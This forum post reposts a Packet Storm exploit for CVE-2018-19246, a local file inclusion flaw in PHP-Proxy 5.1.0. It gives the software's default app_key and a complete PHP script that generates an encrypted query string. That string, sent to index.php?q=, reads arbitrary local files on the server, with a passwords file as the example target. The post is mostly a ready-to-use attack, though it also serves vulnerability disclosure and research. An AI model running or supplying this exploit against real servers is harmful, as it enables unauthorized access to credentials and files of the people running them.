PHP-Proxy 5.1.0 Local File Inclusion

#215
Topic created · 1 Posts · 1 Views
  • PHP-Proxy version 5.1.0 suffers from a local file inclusion vulnerability.
    MD5 | 96c23b5c4ac90b08c6b144a53cf3862d
    Download

    # Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion  
    # Date: 2018-11-13  
    # Exploit Author: Ameer Pornillos  
    # Contact: https://ethicalhackers.club  
    # Vendor Homepage: https://www.php-proxy.com/  
    # Software Link: https://www.php-proxy.com/download/php-proxy.zip  
    # Version: 5.1.0  
    # Category: Webapps  
    # Tested on: XAMPP on Win10_x64  
    # Description: Downloadable pre-installed version of PHP-Proxy 5.1.0   
    # make use of a default app_key wherein can be used for local file inclusion  
    # attacks. This can be used to generate encrypted string which   
    # can gain access to arbitrary local files in the server.  
    # http://php-proxy-site/index.php?q=[encrypted_string_value]  
    # CVE: CVE-2018-19246  
    # POC:   
    # 1)  
    # Generate encrypted string value using the PHP script below  
    # 2)  
    # Browse to URL   
    # http://php-proxy-site/index.php?q=[encrypted_string_value]  
    # to read local file  
    <?php  
    $file = "file:///C:/xampp/passwords.txt"; //example target file to read  
    $ip = "192.168.0.1"; //change depending on your IP address that access the app  
    $app_key = "aeb067ca0aa9a3193dce3a7264c90187";  
    $key = md5($app_key.$ip);  
    function str_rot_pass($str, $key, $decrypt = false){  
    $key_len = strlen($key);  
    $result = str_repeat(' ', strlen($str));  
    for($i=0; $i<strlen($str); $i++){  
    if($decrypt){  
    $ascii = ord($str[$i]) - ord($key[$i % $key_len]);  
    } else {  
    $ascii = ord($str[$i]) + ord($key[$i % $key_len]);  
    }  
    $result[$i] = chr($ascii);  
    }  
    return $result;  
    }  
    function base64_url_encode($input){  
    return rtrim(strtr(base64_encode($input), '+/', '-_'), '=');  
    }  
    echo base64_url_encode(str_rot_pass($file, $key));  
    ?>  
    

    Source: packetstormsecurity.com

Log in to reply